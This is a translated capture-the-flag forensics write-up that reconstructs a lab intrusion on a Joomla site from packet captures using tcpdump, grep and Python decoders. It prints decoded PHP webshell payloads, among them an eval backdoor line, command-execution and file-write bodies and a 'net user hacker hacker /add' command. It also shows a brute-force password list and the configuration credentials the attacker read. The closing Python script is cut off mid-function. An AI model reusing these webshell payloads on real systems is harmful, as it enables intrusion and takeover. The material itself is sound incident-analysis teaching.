Information Security Triathlon Finals (Data Track), Problem 2



All problems: https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00002.md


First, following a teammate's discovery, the attacker's IP was identified: 172.16.10.121
The command below extracts every HTTP request and response packet.
I wrapped it in a shell script; extracting all of the packets took roughly two minutes.

tcpdump -A -s 0 'host 172.16.10.121 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -r 1_00005_20170908171421.pcap > 5

#!/bin/bash
# Dump the payload-carrying TCP packets to/from the attacker out of every pcap
# in the current directory, one text file per capture, then concatenate them.

target_file='http.txt'
target_folder='http'
attacker='172.16.10.121'
# BPF filter: traffic to/from the attacker whose TCP payload length is non-zero
filter="host ${attacker} and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)"

mkdir -p "${target_folder}"
touch "${target_folder}/${target_file}"

for file in *.pcap; do
    echo "Dumping http packets in ${file}..."
    tcpdump -A -s 0 "${filter}" -r "${file}" > "${target_folder}/${file}.txt"
    echo "${file} Done!"
done

# only the per-capture dumps (*.pcap.txt), so http.txt is never appended to itself
for file in "${target_folder}"/*.pcap.txt; do
    cat "${file}" >> "${target_folder}/${target_file}"
done

Doing the same in Wireshark would have taken far longer.
One has to marvel at the power of command-line tools.

Then go into the http folder
and simply search for the keywords typical of common web attack techniques.
For example, the following questions:

  1. What IP range did the attacker port-scan inside the internal network?
    For the first question, since the attacker pivoted into the internal network, they may well have used the tool reGeorg.
    Its key fingerprints are tunnel, tunnel.php and tunnel.nosocket.php.
    Try searching for them:
grep -r -n 'tunnel.php' http.txt

Many results like the following turned up:

POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21

In fact, if you are familiar with reGeorg, you can search directly for the keyword:

?cmd=connect&target=

because reGeorg uses this interface whenever it establishes a new TCP connection.

grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F ' HTTP' '{print $1}' | sort | uniq | sed 's/\&port\=/ /g'
grep '\?cmd=connect\&target=[0-9]' http.txt | awk -F '\?cmd=connect\&target=' '{print $2}' | awk -F '&port' '{print $1}' | sort | uniq

This command is enough to answer the question:


Answer: 192.168.28.120-192.168.28.135

  2. The connection password of the first webshell the attacker used
    Since it is a webshell on a PHP site,
    start by searching for keywords such as eval / assert
grep -n 'eval(' [0-9]*.txt

Since the packet captures provided by the organizers are already in chronological order,
the webshell connection password used during the external penetration must be: Jshell
The ones used during the internal penetration should be Bshell or cmd_shell

  3. The connection password of the webshell the attacker used on BlueCMS during the internal penetration
    Answer: Bshell

  4. The IP of the first network adapter of the internal bluecms host
    Network adapter IP:
    the attacker probably ran the system's ipconfig or ifconfig command,
    so just grep for those command keywords


Answer: 192.168.20.117

It is a Windows server.

  5. The attacker added a user on the internal network; find the username and password
    Since it is a Windows server, the command to add a user is of course net user [USERNAME] [PASSWORD] /add
cat -n http.txt | grep 71202 | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
net user hacker hacker /add

Having got this far, I think it is better not to rush through the questions but to analyze the attacker's attack flow first.
Start from the one-line webshells,
beginning with Jshell.

grep 'Jshell=' http.txt | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | sed 's/%3D/=/g'
import base64
from urllib.parse import unquote

# each line of "shell" is one URL-encoded Jshell POST body from the grep above
with open("shell") as f:
    for line in f:
        print("-" * 32)
        data = "Jshell=@eval(ba" + unquote(line)[16:-1]
        print(data)
        # every parameter after the password (z0, z1, ...) is base64-encoded
        for param in data.split("&")[1:]:
            key, _, value = param.partition("=")
            # restore any '=' padding that was stripped, then decode
            padded = value + "=" * (-len(value) % 4)
            try:
                decoded = base64.b64decode(padded, validate=True).decode("utf-8", "replace")
            except ValueError:
                decoded = value  # not base64 at all (e.g. a literal path)
            print("%s=%s" % (key, decoded))
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=[base64 elided]']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// Get the operating system information and username

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=[base64 elided]', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// List all files in the directory C:\\phpstudy\\WWW\\joomla\\
y.P.l.l...Rb.P.......8 12:47:10 1212    0666
LICENSE.txt 2015-09-08 12:47:10 18092   0666
README.txt  2015-09-08 12:47:10 4213    0666
robots.txt  2015-09-08 12:47:10 842 0666
web.config.txt  2015-09-08 12:47:10 1690    0666

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcdHVubmVsLnBocA==', 'z2=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\tunnel.php
z2=
// Upload a file to C:\\phpstudy\\WWW\\joomla\\tunnel.php

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=[base64 elided]', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxc']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\
// List all files in the directory C:\\phpstudy\\WWW\\joomla\\

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXRzdGF0IC1hbiB8IGZpbmQgIkVTVEFCTElTSEVEIiZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&netstat -an | find "ESTABLISHED"&echo [S]&cd&echo [E]
// Run the system command netstat -an | find "ESTABLISHED"
第二题 ›› strings *.pcap | grep ESTABLISHED
->|  TCP    127.0.0.1:1629         127.0.0.1:3306         ESTABLISHED
  TCP    127.0.0.1:3306         127.0.0.1:1629         ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.115:1628     ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62858    ESTABLISHED
  TCP    192.168.20.117:80      172.16.10.121:62859    ESTABLISHED
  TCP    192.168.20.117:1628    172.16.10.115:80       ESTABLISHED
  TCP    192.168.28.130:2318    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:2322    192.168.28.131:21      ESTABLISHED
  TCP    192.168.28.130:3473    192.168.28.131:21      ESTABLISHED

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZ3aG9hbWkmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&whoami&echo [S]&cd&echo [E]
// Run the system command whoami
admin-6ef5d71ed\administrator

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZpcGNvbmZpZyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ==']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&ipconfig&echo [S]&cd&echo [E]
// Run the system command ipconfig
->|
Windows IP Configuration
Ethernet adapter ........ 2:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.20.117
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.20.1
Ethernet adapter ........:
   Connection-specific DNS Suffix  . : 
   IP Address. . . . . . . . . . . . : 192.168.28.130
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 
[S]
C:\phpstudy\WWW\joomla
[E] 
|<-

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /addd&echo [S]&cd&echo [E]
// Run the system command net user hacker hacker /addd
// Syntax error, the command failed
->|.... /ADDD ......
 
..............:
 
 
NET USER 
[username [password | *] [options]] [/DOMAIN]
         username {password | *} /ADD [options] [/DOMAIN]
         username [/DELETE] [/DOMAIN]
 
...... NET HELPMSG 3506 ..................
 
[S]

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=', 'z1=Y21k', 'z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xqb29tbGFcIiZuZXQgdXNlciBoYWNrZXIgaGFja2VyIC9hZGQmZWNobyBbU10mY2QmZWNobyBbRV0=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\joomla\"&net user hacker hacker /add&echo [S]&cd&echo [E]
// Run the system command net user hacker hacker /add
// Executed successfully

--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==', 'z1=QzpcXHBocHN0dWR5XFxXV1dcXGpvb21sYVxcY29uZmlndXJhdGlvbi5waHA=']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// Read the contents of C:\\phpstudy\\WWW\\joomla\\configuration.php
->|<?php
class JConfig {
    public $offline = '0';
    public $offline_message = '.....................<br /> ..................';
    public $display_offline_message = '1';
    public $offline_image = '';
    public $sitename = 'test';
    public $editor = 'tinymce';
    public $captcha = '0';
    public $list_limit = '20';
    public $access = '1';
    public $debug = '0';
    public $debug_lang = '0';
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'mysqlpasswd';
    public $db = 'joomla';
    public $dbprefix = 'shf76_';
    public $live_site = '';
    public $secret = 'BjbqVIMNAt3nB7Dc';
    public $gzip = '0';
    public $error_reporting = 'default';
    public $helpurl = 'https://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
    public $ftp_host = '';
    public $ftp_port = '';
    public $ftp_user = '';
    public $ftp_pass = '';
    public $ftp_root = '';
    public $ftp_enable = '0';
    public $offset = 'UTC';
    public $mailonline = '1';
    public $mailer = 'mail';
    public $mailfrom = 'admin@123.com';
    public $fromname = 'test';
    public $sendmail = '/usr/sbin/sendmail';
    public $smtpauth = '0';
    public $smtpuser = '';
    public $smtppass = '';                                                                                                           
    public $smtphost = 'localhost';
    public $smtpsecure = 'none';
    public $smtpport = '25';
    public $caching = '0';
    public $cache_handler = 'file';
    public $cachetime = '15';
    public $MetaDesc = 'sssss';
    public $MetaKeys = '';
    public $MetaTitle = '1';
    public $MetaAuthor = '1';
    public $MetaVersion = '0';
    public $robots = '';
    public $sef = '1';
    public $sef_rewrite = '0';
    public $sef_suffix = '0';
    public $unicodeslugs = '0';
    public $feed_limit = '10';
    public $log_path = 'C:\\phpstudy\\WWW\\joomla/logs';
    public $tmp_path = 'C:\\phpstudy\\WWW\\joomla/tmp';
    public $lifetime = '15';
    public $session_handler = 'database';
    public $memcache_persist = '1';
    public $memcache_compress = '0';
    public $memcache_server_host = 'localhost';
    public $memcache_server_port = '11211';
    public $memcached_persist = '1';
    public $memcached_compress = '0';
    public $memcached_server_host = 'localhost';
    public $memcached_server_port = '11211';
    public $redis_persist = '1';
    public $redis_server_host = 'localhost';
    public $redis_server_port = '6379';
    public $redis_server_auth = '';
    public $redis_server_db = '0';
    public $proxy_enable = '0';
    public $proxy_host = '';
    public $proxy_port = '';
    public $proxy_user = '';
    public $proxy_pass = '';
    public $massmailoff = '0';
    public $MetaRights = '';
    public $sitename_pagetitles = '0';
    public $force_ssl = '0';
    public $session_memcache_server_host = 'localhost';
    public $session_memcache_server_port = '11211';
    public $session_memcached_server_host = 'localhost';
    public $session_memcached_server_port = '11211';
    public $frontediting = '1';
    public $feed_email = 'author';
    public $cookie_domain = '';
    public $cookie_path = '';
    public $asset_id = '1';
|<-


--------------------------------
['Jshell=@eval(base64_decode($_POST[z0]));', 'z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7', 'z1=C:\\\\phpstudy\\\\WWW\\\\joomla\\\\configuration.php']
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\joomla\\configuration.php
// Read the contents of C:\\phpstudy\\WWW\\joomla\\configuration.php

Let's look at how this Jshell was written to the server.


The first three lines should be the vulnerability being used to write the file contents.


We can see that the attacker used the file

/administrator/index.php?option=com_templates&view=template&id=503&file=L2luZGV4LnBocA
to edit index.php ("L2luZGV4LnBocA".decode("base64") == "index.php")

and inserted one line into index.php:

<?php eval($_POST['Jshell']);?>

Tracing further back: how did the attacker log in?

http ›› grep -n -C 32 'POST /administrator/' [0-9]*.txt | grep 'username' | grep -o 'username.*'
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&120b2c391a29a8d9518b5bf1f1ec7f29=1
username=admin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=123456&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=a123456789&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=1234567890&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=ftpadmin&passwd=woaini1314&lang=&option=com_login&task=login&return=aW5kZXgucGhw&e363da4c284ad27bad052b3a23795168=1
username=admin&passwd=apple&lang=&option=com_login&task=login&return=aW5kZXgucGhw&f2426d9ea34e95fe916e6309d7028835=1
username=admin&passwd=apple&option=com_login&task=login&return=aW5kZXgucGhw&2bb30f381fad54b0ca7f4088e7e9cc97=1

We can see that the attacker had earlier brute-forced the administrator password.
The last two attempts use the same credentials, admin/apple,
which are very likely the correct password.
Compare the earlier response packets with the final one:



When a wrong password was tried, the server returned 303 See Other and redirected to /administrator/index.php.
This can also be seen in the content of index.php:


<p class="alert-message">Username and password do not match or you do not have an account yet.</p>

When the login really succeeded, although a 303 was likewise returned, redirecting to /administrator/index.php,
the content of index.php is clearly different.


By brute-forcing the password the attacker obtained the administrator credentials admin/apple.

That about wraps up the analysis of Jshell.

Next, let's look at how the attacker uploaded Bshell.
Bshell lives on the internal network; the attacker pivoted into it with reGeorg, and the pivot file was named tunnel.php.
There is a small trick here:
in tunnel.php's implementation, each independent TCP connection is maintained by one session,
so a PHPSESSID can be used to track the HTTP requests that belong to one connection into the internal network.
The URL that opens a new connection looks like ?cmd=connect&target=8.8.8.8&port=8888
Sending data: ?cmd=forward
Reading data: ?cmd=read
Disconnecting: ?cmd=disconnect
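Grouping the tunnel requests by PHPSESSID in this way rebuilds each tunnelled TCP connection and, from the connect targets, the scanned range asked for in question 1. The Python 3 script below is an added example (not part of the original writeup), run on a constructed sample of requests with made-up PHPSESSID values; it accepts both relative and absolute request URLs, as the tcpdump output shows both.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample of requests to the pivot, in the shape the tcpdump -A
# dump yields (request line, then headers, blank line between requests).
# The PHPSESSID values are made up; the targets follow the capture above.
SAMPLE_REQUESTS = """\
POST /tunnel.php?cmd=connect&target=192.168.28.131&port=21 HTTP/1.1
Cookie: PHPSESSID=sess-a

POST /tunnel.php?cmd=forward HTTP/1.1
Cookie: PHPSESSID=sess-a

POST /tunnel.php?cmd=read HTTP/1.1
Cookie: PHPSESSID=sess-a

POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.120&port=80 HTTP/1.1
Cookie: PHPSESSID=sess-b

POST /tunnel.php?cmd=disconnect HTTP/1.1
Cookie: PHPSESSID=sess-b

POST /tunnel.php?cmd=disconnect HTTP/1.1
Cookie: PHPSESSID=sess-a

GET /index.php HTTP/1.1
Cookie: PHPSESSID=unrelated
"""

REQUEST_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
SESSION_COOKIE = re.compile(r"PHPSESSID=([^;\s]+)")


def parse_requests(text):
    """Yield (phpsessid, query dict) for every tunnel.php request in text."""
    for block in text.strip().split("\n\n"):
        lines = block.strip().splitlines()
        m = REQUEST_LINE.match(lines[0])
        if not m or not urlsplit(m.group(2)).path.endswith("/tunnel.php"):
            continue  # not a tunnel request
        query = {k: v[0] for k, v in parse_qs(urlsplit(m.group(2)).query).items()}
        sid = None
        for header in lines[1:]:
            if header.lower().startswith("cookie:"):
                c = SESSION_COOKIE.search(header)
                sid = c.group(1) if c else None
        yield sid, query


def new_tunnel():
    return {"target": None, "port": None, "forward": 0, "read": 0, "closed": False}


def reconstruct_tunnels(text):
    """Group requests by PHPSESSID: one record per tunnelled TCP connection,
    with the connect target/port, forward/read counts and whether it closed."""
    tunnels = {}
    for sid, query in parse_requests(text):
        t = tunnels.setdefault(sid, new_tunnel())
        cmd = query.get("cmd")
        if cmd == "connect":
            t["target"] = query.get("target")
            t["port"] = int(query.get("port", 0))
        elif cmd in ("forward", "read"):
            t[cmd] += 1
        elif cmd == "disconnect":
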